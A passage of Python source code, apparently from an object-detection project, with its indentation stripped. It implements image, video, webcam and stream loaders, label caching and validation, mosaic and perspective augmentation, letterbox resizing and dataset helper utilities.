self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
print(f'{i + 1}/{n}: {s}... ', end='')
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {self.fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
success, im = cap.retrieve()
self.imgs[index] = im if success else self.imgs[index] * 0
n = 0
time.sleep(1 / self.fps) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return ['txt'.join(x.replace(sa, sb, 1).rsplit(x.split('.')[-1], 1)) for x in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels
if cache_path.is_file():
cache, exists = torch.load(cache_path), True # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed
cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
cache.pop('version') # remove version
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
pbar.close()
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
try:
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
except Exception as e:
logging.info(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # path not writeable
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
img = cv2.resize(img, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def hist_equalize(img, clahe=True, bgr=False):
# Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
use_segments = any(x.any() for x in segments)
new = np.zeros((n, 4))
if use_segments: # warp segments
segments = resample_segments(segments) # upsample
for i, segment in enumerate(segments):
xy = np.ones((len(segment), 3))
xy[:, :2] = segment
xy = xy @ M.T # transform
xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine
# clip
new[i] = segment2box(xy, width, height)
else: # warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
targets = targets[i]
targets[:, 1:5] = new[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
